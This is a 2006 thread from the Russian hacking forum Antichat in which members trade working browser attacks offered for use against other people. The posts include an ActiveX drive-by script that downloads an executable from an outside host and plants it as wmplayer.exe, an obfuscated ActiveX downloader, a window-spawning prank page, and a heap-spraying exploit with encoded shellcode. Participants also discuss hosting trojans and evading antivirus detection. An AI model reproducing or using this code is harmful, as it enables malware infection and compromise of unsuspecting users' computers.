Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Html скрипт загрузки вируса на удалёный комп! (https://forum.antichat.xyz/showthread.php?t=18262)

Ponchik 27.04.2006 04:29

Html скрипт загрузки вируса на удалёный комп!
 
Незнаю, может кто-то такое и выкладывал... По моему скрипт просто золотой =) Я его стырил с сайта, куда он был встроен...

<script language="javascript">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://www.cup-of-coffee.pnz.ru/upload/bin.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);
location.href = "mms://";
</script>

Незнаю, правильно я его вырезал, или нет... Проверять нехочу =) По адрессу http://www.cup-of-coffee.pnz.ru/upload/bin.exe ничего нет, ну всёравно на свой менять будем! И адресс в Program Files странно прописан, но в таком состоянии он был на сайте... Как он действует =) Через ActiveX загружается файл, (в нашем случаи http://www.cup-of-coffee.pnz.ru/upload/bin.exe) и заменяется на C:\Program Files\Windows Media Player\wmplayer.exe тоесть вместо Windows Media Player! Потом нас кидает на mms:// а это ссылка на медиа файл, и автоматически запускается Windows Media Player, который находится по адрессу C:\Program Files\Windows Media Player\wmplayer.exe где уже вместо него лежит наш вирус ;)

По моему офигительный скрипт!

Desr0w 27.04.2006 04:38

Thx пробну;)

Ponchik 27.04.2006 05:43

Я в шоке!!! ОН РАБОТАЕТ!!! И путь реально надо указывать C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe всмысле 4 палки, и он загружается! Вот это да...
<offtopic>
Мне кажеться, или сейчас будет эпидемия пинча, ксинча и всякой другой заразы ;)
</offtopic>

Хозяин 27.04.2006 11:51

Ponchik, не мог бы ты по-подпробнее объяснить ... что-то у меня не выходит ...
Подвесил скрипт (заменив "http://www.cup-of-coffee.pnz.ru/upload/bin.exe" на ссылку со своими трояном)
Тестировал на себе ... (трой рабочий на 100%)
WM не запускается, трой не срабатывает ...
(вешал на народе)

censored! 27.04.2006 12:22

скрипт палиться Касперским

Цитата:

(вешал на народе)
повесь на jino-net.ru

vectorg 27.04.2006 12:33

пример работы скрипта был уже на видео -> http://video.antichat.ru/file179.html

Ponchik 27.04.2006 15:29

VectorG, Эх... Ну всёавно многие люди невидели то видео... Такчто надеюсь от темы будет польза...
Посмторел видео... Можно тестить другим способом, никаких свойств рабочего стола ненадо! Просто создать HTML файл, сайт необязательно jino-net.ru я на локалхосте делал. А путь можно изменить на C:////test.exe
В итоге у вас будет файл с сайта на диске C:/ и откроется Windows Media Player
==================================================
AciD_FreaK, ну ты сделай как я сказал, не спросисывай сразу в Program Files, а на диск C:/ и может версия IE не подходит...
==================================================
censored!, покажи хоть что-то что не палится каспеским =))))) В сетях на всех компах один IP, поэтому троянсие проги немогут их просканировать, тоесть у тех юзверей не бывает вирусов, из чего следует что у них нет антивирусов! Можно на каком-то сайте какой-то трой подсунуть, например ксинч

nerezus 27.04.2006 15:37

Цитата:

покажи хоть что-то что не палится каспеским =)))))
если покажет - то оно начнет палиться )

censored! 27.04.2006 16:44

Цитата:

AciD_FreaK
На Народе может не запахать, так как Народ не отдает свои файлы и изображения другим сайтам. Поэтому и пробуй Jino-Net.

Цитата:

censored!, покажи хоть что-то что не палится каспеским
После очередного обновления БД антивиря сам найдешь на своем компе. Там этого полно! =)

Музыкант ♪♫ 27.04.2006 16:49

Цитата:

Html скрипт
хаха.

Ponchik 27.04.2006 19:25

Музыкант, ну Java... Главное работает!

r0 28.04.2006 10:21

Цитата:

<script language=javascript>
function souese() {return true;}
window.onerror=souese;
var dr="http://net.org/1.exe";
var sd="Microsoft.XMLHTTP";
var f="ADODB.Stream";
try{
b=new ActiveXObject("'+sd+'");
o=new ActiveXObject(''+f+'');
}
catch(e){};
try{document.write('<object cla'+'ssid=clsid:11311111-1551-1661-1771-%0 codebase="'+dr+'" style=display:none>');}catch(e){document.write('<o bject classid=clsid:15875600-1000-7600-10430-%0 codebase="'+dr+'" style=display:none></object>');}</script>
вот выложу тож, старенькой правда,палиться, работает только при низкой настройке безопасности.. ну да все равно)

Ponchik 28.04.2006 15:17

r0cha!, кульно! А куда он сохраняется, или запускается прямо из браузера так? Если так, то клёво!

r0 29.04.2006 19:34

Тогда "клёво"

Ponchik 04.05.2006 07:16

А... Вот ещё, старый, но работает, я правда так понимаю это не пирус, но что он делает с компом кроме зависания, я так и не понял... Он чтоли в telnet забивает ('location="telnet:Запуск вируса произведён удачно!!!" или я что-то не так понял...
Код HTML:

<html>
<head>
<title>Progressive-XP</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<script>setInterval('location="telnet:Запуск вируса произведён удачно!!!"',10);</script>
<script language="javascript1.3">
setInterval('resizeTo(100,200)',0050);
x=50;
y=50;
function plusY(){
if(y<screen.height-200){
  y+=25;
  setTimeout('plusY()',0020);
  window.moveTo(x,y);
 }else{
  minusY();
 }
}
function minusY(){
if(y>
0){
y-=25;
setTimeout('minusY()',0020);
window.moveTo(x,y);
 }else{
plusY();
 }
}

function plusX(){
if(x<screen.width-100){
 x+=20;
  setTimeout('plusX()',0020);
  window.moveTo(x,y);
 }else{
  minusX();
 }
}
function minusX(){
if(x>
0){
x-=20;
setTimeout('minusX()',0020);
window.moveTo(x,y);
 }else{
plusX();
 }
}
setInterval('window.open("","","height=200 width=100").location=self.location',0500);
</script>
</head>

<body>
<strong>Загрузка ... </strong>
</body>
</html>

Блин! Касперь его палин! not-virus:BadJoke.JS.Spawn.e
А несколько лет назад не палил :)
В общем пошутить над ламаком без антивируса можно =)

grinay 04.05.2006 09:30

Запустика это:)
Работает сто пудов под хп. осел 6.

Код:



<html>
<head>
        <script language="javascript">
    var _GmIw=unescape("%u4b15%ud123%uc1fe%ubef9%u9637%u7c73%ue302%u7a7f%ua80d%u2575%u8148%u69e2%u9bd6%ueb80%u0c7d%u7e99%ub149%u7672%u904a%u4005%u2f79%u9334%ub6b4%u4b77%u9f3f%u7478%uf513%ub247%ub998%u3d71%ua9b8%u22b0%ub5fd%ub741%u034f%u14f9%ubabb%u434e%u3c42%u86b3%u35e0%ue139%ud520%u271c%u0a67%u15f8%u662d%ube04%u7097%u2437%u337b%u92fc%ud430%u2cbf%u1d91%u8496%u7deb%u7a70%u467e%u78b1%ua937%u4697%u0999%u32e1%u34d5%u96b2%u7343%u087f%u2cfc%u6679%u14be%u1d7c%ub51c%u3fba%u924f%u6bbf%u49d4%u8904%u27e0%ub8b9%ue285%u9024%u397b%ue3f6%u2d77%u41bb%u154a%u25b0%u4076%u9b9f%ub4b3%u4872%u0c71%u2fa8%u74b7%u0b35%u93d6%u3c05%u2198%u47f9%u7591%u4e42%u3d0d%u194b%ub6f8%u6967%u38f5%u7be2%u027c%ub1fd%u7f9f%ud403%u900c%ue03a%u2a47%u78d5%u3248%ufcc0%ue184%u963d%u0d99%ub341%u677d%u7043%u1c4f%ub266%u34b0%u4bb7%ud180%u2feb%ud601%ue311%u7579%u427e%ua904%uf523%u9305%u4ea8%u4698%u3577%u4ab6%u15bf%u3c37%ubebb%u9bb5%u3fba%uf983%u9291%ub924%u1d97%u7649%uf808%u732c%u2d25%u7271%u407a%u7414%u1027%ub8fd%u98b4%ud213%u7de1%ud418%ueb86%uf71a%u7ed6%u727a%u0d7f%u7b4f%u4a70%u1442%u3471%u9135%u66b5%ubab4%u24b0%ube9f%u81b6%u2ce0%ud53b%u883f%u2ffc%u2d40%ue329%u924b%u0abb%ua8fd%u411c%u3d48%u7c05%u7877%u1504%u3796%u49b1%ub79b%u2597%u2243%ubff8%u79b2%u7376%uf520%ub9b3%u0c99%u281d%u74e2%ub867%u2793%u9046%u47a9%u4e3c%u1b75%u90f9%uf92b%u307e%u14e3%u3149%ud0d3%u3de0%u4399%ub4a9%u3f24%u797c%ubb34%u98b1%u7225%u7667%ueb12%u3c78%u747b%ua837%ubf0c%ufe87%uf8c1%u71b9%u9740%u0dba%u33b8%u9fd5%u1593%u1d41%ue285%uf632%u1cd6%u137f%ub2f5%u4ab7%u057a%u77b6%u2f35%u4f91%u4847%ud42b%u757d%ub504%u6673%u70be%ufd0b%u4b42%ub02d%u27b3%u1946%u2ce1%ueb01%u777e%u7b7a%u924e%u8996%u78e2%ufc33%u989b%ub89f%u6971%ubbd5%u297f%ue0f7%ub127%u3c7c%u25a8%u4375%ub3b0%u1a3f%uc0ff%u24f8%u2c73%u1cb9%ube9b%uf920%ubab4%u4790%u7046%u4105%ufd10%ub666%u1d79%u4234%ub74e%ua915%ub5bf%u0d76%u120c%u72e1%ud403%u3d91%u4a48%u4937%u3996%u74f5%u3567%ud083%u97d6%u40b2%u284b%u2ffc%u8692%u4fe3%u992d%u7d04%u9314%u7371%u7a70%u7879%u117d%ud1c1%u09e2%ub7f9%u97b8%u7eb0%u2476%ue088%u7274%uba0d%u312d%u67eb%u9bb1%u96bb%ub4bf%u7fb9%u407c%u9f49%u904f%u924e%u483f%u21b3%u30d6%u75d4%uf523%u9991%u4346%u3466%ue102%u3c0c%ua927%u3b77%u2ae3%u41fc%u0535%u4a15%ud508%u421d%u477b%ufd0a%u4b77%ub6a8%u707c%u7a04%u8137%u2fe0%ubeb2%uf880%u7e98%u791c%ub53d%u7393%ue13a%ueb18%u7825%u7d14%u992c%u1c74%u9f98%ub296%u4776%u1475%ua949%u3771%ubeb0%u387b%ud4f5%ub427%u92b8%u3472%u0490%u3d40%u257f%u4a41%ud284%u1be2%ub6d5%ufc22%u0c67%ub393%u3fa8%u464e%u351d%ue348%u420d%u6643%u05b7%u2cb1%u3c2d%ub915%u4bf8%u9bbb%uf987%u6b91%u24fd%ubabf%ud397%ub5d6%u4f2f%uc933%ue983%ud9d8%ud9ee%u2474%u5bf4%u7381%u1213%u127a%u83e6%ufceb%uf4e2%u92ee%ue656%u7a12%ua399%uf12e%ue36e%u7b6a%u6dfd%u625d%ub999%u7b32%uaff9%u4e99%ue799%u4bfc%u7fd2%ufebe%u92d2%ubb15%uebd8%ub813%u12f9%u2e29%ue236%u9f67%ub999%u7b36%u80f9%u7699%u6d59%u664d%u0d13%u6699%ue799%uf3f9%uc24e%ub916%u2623%uf176%ud652%uba97%uea6a%u3a99%u6d1e%u6662%u6dbf%u727a%ueff9%ufa99%ue6a2%u7a12%u8e99%u252e%u1023%u2c72%u1e9b%uba91%ub669%u8a7a%ue298%u124d%u188a%u7498%u1945%u5ff5%u9f41%u0e61%u8b77%u1540%u927d%u2937%u956b%u1f66%ud57f%u0920%u8a7d%u1f3c%u836a%u7a12%ue612");

    var _v41oHV=unescape("%u4bb7%u2747");
    var _qEsu=20+_GmIw.length;
    while (_v41oHV.length<_qEsu)
    {
        _v41oHV+=_v41oHV;
    }   

    var _xEzxzS=_v41oHV.substring(0,_qEsu);
    var _p6ChJV=_v41oHV.substring(0,_v41oHV.length-_qEsu);

    while(_p6ChJV.length+_qEsu<0x40000)
    {
        _p6ChJV+=_xEzxzS;
    }   

    var _CBc0mV=new Array();
    var _GeT5iua=0;
    var _9h88XE=2020;
   
    function _SWPVoJC() {
      _BbieHz.innerHTML=Math.round((_GeT5iua/_9h88XE)*100);
      if (_GeT5iua<_9h88XE) {
        _CBc0mV.push(_p6ChJV+_GmIw);
        _GeT5iua++;
       
      }
      else {
        _BbieHz.innerHTML=100;
        _erv7QtZ=document.createElement("input");
        _erv7QtZ.type="radio";
        _J14xn3ho=_erv7QtZ.createTextRange();       
      }
    } 
   
    function _DzaOkN() {
      setInterval('_SWPVoJC()', 5);
    }
        </script>
</head>
<body onload="_DzaOkN()">
Sit back and relax as your windows box is being exploited using a non CPU consuming heap spraying exploit.<BR />
In the meantime, you can open your task manager and watch how the VM size of IEXPLORE.EXE grows, while the CPU time of this process is very low.<BR />
Progress: <span id="_BbieHz"></span>%
</body>
</html>


Гаврила 05.05.2006 18:51

grinay,у меня даже при просмотре твоего сообщения процессор глючить начинает.

...ъХ... 05.05.2006 23:18

А чем кодирован последний скрипт, поидее касперский пищать на него тоже должен, или я что- то недопонимаю?

Ponchik 06.05.2006 08:34

Пищит! Exploit.JS.CVE-2006-1359.m

...ъХ... 06.05.2006 16:22

Странно, у меня молчок Avp на этот скрипт, может дело в месячной давности баз...
А чем нибудь закодировать скрипт можно чтоб антивирусы отдыхали, не первый раз вопрос этот на форумах задаю, доходчивого ответа ещё не получял, где пишут "да" где "нет" может тут есть знающие люди?


Время: 14:52